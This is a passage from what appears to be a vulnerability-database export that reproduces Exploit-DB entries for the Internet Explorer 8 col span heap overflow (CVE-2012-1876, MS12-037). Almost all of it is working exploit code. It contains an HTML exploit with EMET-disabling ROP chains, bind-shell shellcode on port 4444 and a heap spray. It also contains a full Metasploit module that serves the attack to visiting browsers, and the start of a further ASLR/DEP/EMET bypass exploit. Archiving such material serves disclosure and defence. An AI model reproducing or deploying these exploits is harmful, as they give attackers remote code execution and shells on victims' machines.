unescape(\"%u8b07%u8b00\");\n shellcode+= unescape(\"%u6800%u10c8\");\n shellcode+= unescape(\"%u076d%ud0ff\");\n shellcode+= unescape(\"%ud468%u6d10\");\n shellcode+= unescape(\"%u5007%uc4b8\");\n shellcode+= unescape(\"%u6d10%u8b07\");\n shellcode+= unescape(\"%u8b00%uff00\");\n shellcode+= unescape(\"%u8bd0%u81f0\");\n shellcode+= unescape(\"%uccec%u0002\");\n shellcode+= unescape(\"%uc700%u2404\");\n shellcode+= unescape(\"%u0010%u0001\");\n shellcode+= unescape(\"%ufc8b%uccb9\");\n shellcode+= unescape(\"%u0002%u8300\");\n shellcode+= unescape(\"%u04c7%ue983\");\n shellcode+= unescape(\"%u3304%uf3c0\");\n shellcode+= unescape(\"%u54aa%ufe6a\");\n shellcode+= unescape(\"%ud6ff%u9090\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\n shellcode+= \"NTDLL\";\n shellcode+= unescape(\"%u0000\");\n shellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread\n shellcode+= unescape(\"%u4374%u6e6f\");\n shellcode+= unescape(\"%u6574%u7478\");\n shellcode+= unescape(\"%u6854%u6572\");\n shellcode+= unescape(\"%u6461%u0000\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/remote/33944.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:35:34", "description": "", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-1876", "CVE-2012-1876"], "modified": "2012-08-02T00:00:00", "id": "EDB-ID:20174", "href": "https://www.exploit-db.com/exploits/20174", "sourceData": "##\n# This file is part of the Metasploit Framework and may be subject to\n# redistribution and commercial restrictions. Please see the Metasploit\n# web site for more information on licensing and terms of use.\n# http://metasploit.com/\n##\n\nrequire 'msf/core'\n\nclass Metasploit3 < Msf::Exploit::Remote\n\tRank = NormalRanking\n\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\n\tautopwn_info({\n\t\t:os_name => OperatingSystems::WINDOWS,\n\t\t:ua_minver => \"8.0\",\n\t\t:ua_maxver => \"8.0\",\n\t\t:rank => NormalRanking, # reliable memory corruption\n\t\t:javascript => true\n\t})\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',\n\t\t\t'Description' => %q{\n\t\t\t\t\tThis module exploits a heap overflow vulnerability in Internet Explorer caused\n\t\t\t\tby an incorrect handling of the span attribute for col elements from a fixed table,\n\t\t\t\twhen they are modified dynamically by javascript code.\n\t\t\t},\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t'Author' =>\n\t\t\t\t[\n\t\t\t\t\t'Alexandre Pelletier', # Vulnerability analysis\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\n\t\t\t\t\t'binjo', # Metasploit module\n\t\t\t\t\t'sinn3r', # Help with the Metasploit module\n\t\t\t\t\t'juan' # Help with the Metasploit module\n\t\t\t\t],\n\t\t\t'References' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'CVE', '2012-1876' ],\n\t\t\t\t\t[ 'OSVDB', '82866'],\n\t\t\t\t\t[ 'BID', '53848' ],\n\t\t\t\t\t[ 'MSB', 'MS12-037' ],\n\t\t\t\t\t[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]\n\t\t\t\t],\n\t\t\t'DefaultOptions' =>\n\t\t\t\t{\n\t\t\t\t\t'EXITFUNC' => 'process',\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\n\t\t\t\t},\n\t\t\t'Payload' =>\n\t\t\t\t{\n\t\t\t\t\t'Space' => 1024,\n\t\t\t\t\t'BadChars' => \"\\x00\",\n\t\t\t\t},\n\t\t\t'Platform' => 'win',\n\t\t\t'Targets' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'Automatic', {} ],\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3 with msvcrt ROP',\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t'Rop' => :msvcrt\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t\t[ 'IE 8 on Windows 7 SP1',\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t'Rop' => :jre\n\t\t\t\t\t\t}\n\t\t\t\t\t]\n\t\t\t\t],\n\t\t\t'Privileged' => false,\n\t\t\t'DisclosureDate' => 'Jun 12 2012',\n\t\t\t'DefaultTarget' => 0))\n\n\t\t\tregister_options(\n\t\t\t\t[\n\t\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n\t\t\t\t], self.class)\n\tend\n\n\tdef get_target(agent)\n\t\t#If the user is already specified by the user, we'll just use that\n\t\treturn target if target.name != 'Automatic'\n\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\n\t\t\treturn targets[1] #IE 8 on Windows XP SP3\n\t\telsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/\n\t\t\treturn targets[2] #IE 8 on Windows 7 with JRE\n\t\telse\n\t\t\treturn nil\n\t\tend\n\tend\n\n\tdef junk(n=4)\n\t\treturn rand_text_alpha(n).unpack(\"V\").first\n\tend\n\n\tdef nop\n\t\treturn make_nops(4).unpack(\"V\").first\n\tend\n\n\tdef get_payload(t)\n\n\t\tcode = payload.encoded\n\n\t\t# Both ROP chains generated by mona.py - See corelan.be\n\t\tcase t['Rop']\n\t\t\twhen :msvcrt\n\t\t\t\tprint_status(\"Using msvcrt ROP\")\n\t\t\t\texec_size = code.length\n\t\t\t\trop =\n\t\t\t\t\t[\n\t\t\t\t\t\t0x77c4ec01, # retn\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\n\t\t\t\t\t\t0x77c15ed5, # xchg eax,esp; retn (pivot)\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\n\t\t\t\t\t\t0x77c11120, # <- *&VirtualProtect()\n\t\t\t\t\t\t0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn\n\t\t\t\t\t\tjunk,\n\t\t\t\t\t\t0x77c2dd6c,\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\n\t\t\t\t\t\t0x77c35459, # ptr to 'push esp; ret'\n\t\t\t\t\t\t0x77c47705, # pop ebx; retn\n\t\t\t\t\t\texec_size, # ebx\n\t\t\t\t\t\t0x77c3ea01, # pop ecx; retn\n\t\t\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\n\t\t\t\t\t\t0x77c46100, # pop edi; retn\n\t\t\t\t\t\t0x77c46101, # rop nop (-> edi)\n\t\t\t\t\t\t0x77c4d680, # pop edx; retn\n\t\t\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\n\t\t\t\t\t\tnop, # nops (-> eax)\n\t\t\t\t\t\t0x77c12df9 # pushad; retn\n\t\t\t\t\t].pack(\"V*\")\n\t\t\twhen :jre\n\t\t\t\tprint_status(\"Using JRE ROP\")\n\t\t\t\texec_size = code.length\n\t\t\t\trop =\n\t\t\t\t\t[\n\t\t\t\t\t\t0x7c346c0b, # retn\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn\n\t\t\t\t\t\t0x7c348b05, # xchg eax,esp; retn (pivot)\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn [MSVCR71.dll]\n\t\t\t\t\t\t0x7c36f970, # skip 4 bytes [MSVCR71.dll]\n\t\t\t\t\t\t0x7c34373a, # pop ebx ; retn [MSVCR71.dll]\n\t\t\t\t\t\texec_size, # ebx\n\t\t\t\t\t\t0x7c3444d0, # pop edx ; retn [MSVCR71.dll]\n\t\t\t\t\t\t0x00000040, # 0x00000040-> edx\n\t\t\t\t\t\t0x7c361829, # pop ecx ; retn [MSVCR71.dll]\n\t\t\t\t\t\t0x7c38f036, # &Writable location [MSVCR71.dll]\n\t\t\t\t\t\t0x7c342766, # pop edi ; retn [MSVCR71.dll]\n\t\t\t\t\t\t0x7c346c0b, # retn (rop nop) [MSVCR71.dll]\n\t\t\t\t\t\t0x7c350564, # pop esi ; retn [MSVCR71.dll]\n\t\t\t\t\t\t0x7c3415a2, # jmp [eax] [MSVCR71.dll]\n\t\t\t\t\t\t0x7c3766ff, # pop eax ; retn [MSVCR71.dll]\n\t\t\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]\n\t\t\t\t\t\t0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]\n\t\t\t\t\t\t0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]\n\t\t\t\t\t].pack(\"V*\")\n\t\tend\n\n\t\tcode = rop + code\n\t\treturn code\n\tend\n\n\tdef on_request_uri(cli, request)\n\n\t\tagent = request.headers['User-Agent']\n\t\tmy_target = get_target(agent)\n\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\n\t\tif my_target.nil?\n\t\t\tprint_error(\"Browser not supported: #{agent}\")\n\t\t\tsend_not_found(cli)\n\t\t\treturn\n\t\tend\n\n\t\tjs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))\n\n\t\ttable_builder = ''\n\n\t\t0.upto(132) do |i|\n\t\t\ttable_builder << \"<table style=\\\"table-layout:fixed\\\" ><col id=\\\"#{i}\\\" width=\\\"41\\\" span=\\\"9\\\" >&nbsp </col></table>\"\n\t\tend\n\n\t\t# About smash_vtable():\n\t\t# * smash the vftable 0x07070024\n\t\t# * span => the amount to overwrite\n\t\tjs_element_id = Rex::Text.rand_text_alpha(4)\n\t\tspray_trigger_js = <<-JS\n\n\t\tvar dap = \"EEEE\";\n\t\twhile ( dap.length < 480 ) dap += dap;\n\n\t\tvar padding = \"AAAA\";\n\t\twhile ( padding.length < 480 ) padding += padding;\n\n\t\tvar filler = \"BBBB\";\n\t\twhile ( filler.length < 480 ) filler += filler;\n\n\t\tvar arr = new Array();\n\t\tvar rra = new Array();\n\n\t\tvar div_container = document.getElementById(\"#{js_element_id}\");\n\t\tdiv_container.style.cssText = \"display:none\";\n\n\t\tfor (var i=0; i < 500; i+=2) {\n\t\t\trra[i] = dap.substring(0, (0x100-6)/2);\n\t\t\tarr[i] = padding.substring(0, (0x100-6)/2);\n\t\t\tarr[i+1] = filler.substring(0, (0x100-6)/2);\n\t\t\tvar obj = document.createElement(\"button\");\n\t\t\tdiv_container.appendChild(obj);\n\t\t}\n\n\t\tfor (var i=200; i<500; i+=2 ) {\n\t\t\trra[i] = null;\n\t\t\tCollectGarbage();\n\t\t}\n\n\t\tfunction heap_spray(){\n\t\t\tCollectGarbage();\n\n\t\t\tvar shellcode = unescape(\"#{js_code}\");\n\n\t\t\twhile (shellcode.length < 100000)\n\t\t\tshellcode = shellcode + shellcode;\n\t\t\tvar onemeg = shellcode.substr(0, 64*1024/2);\n\t\t\tfor (i=0; i<14; i++) {\n\t\t\t\tonemeg += shellcode.substr(0, 64*1024/2);\n\t\t\t}\n\n\t\t\tonemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\t\t\tvar spray = new Array();\n\n\t\t\tfor (i=0; i<400; i++) {\n\t\t\t\tspray[i] = onemeg.substr(0, onemeg.length);\n\t\t\t}\n\t\t}\n\n\t\tfunction smash_vtable(){\n\t\t\tvar obj_col_0 = document.getElementById(\"132\");\n\t\t\tobj_col_0.width = \"1178993\";\n\t\t\tobj_col_0.span = \"44\";\n\t\t}\n\n\t\tsetTimeout(function(){heap_spray()}, 400);\n\t\tsetTimeout(function(){smash_vtable()}, 700);\n\t\tJS\n\n\t\tif datastore['OBFUSCATE']\n\t\t\tspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)\n\t\t\tspray_trigger_js.obfuscate\n\t\tend\n\n\t\t# build html\n\t\tcontent = <<-HTML\n\t\t<html>\n\t\t<body>\n\t\t<div id=\"#{js_element_id}\"></div>\n\t\t#{table_builder}\n\t\t<script language='javascript'>\n\t\t#{spray_trigger_js}\n\t\t</script>\n\t\t</body>\n\t\t</html>\n\t\tHTML\n\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\n\n\t\t# Transmit the response to the client\n\t\tsend_response_html(cli, content)\n\tend\n\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/remote/20174.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:13:16", "description": "", "cvss3": {}, "published": "2014-11-17T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-1876", "CVE-2012-1876"], "modified": "2014-11-17T00:00:00", "id": "EDB-ID:35273", "href": "https://www.exploit-db.com/exploits/35273", "sourceData": "\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\n var rop = rop.toString(16);\n var rop41 = rop.substring(4,8);\n var rop42 = rop.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4444\");\n while (shellcode.length < 100)\n shellcode = shellcode + shellcode;\n var shellcode = shellcode.substr(0, 46);\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01 annihilate ROP protections\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument)\n shellcode+= unescape(\"%u7372%u0006\"); // Offset to \"decoding helper\" 0x67372\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\"\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # RETN\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on)\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n\n // Store various pointers here\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // Store various pointers here\n\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread\n // MOV EAX,DWORD PTR DS:[076D10BCH]\n // MOV EAX,DWORD PTR DS:[007D25F48H]\n // MOV ESI,DWORD PTR 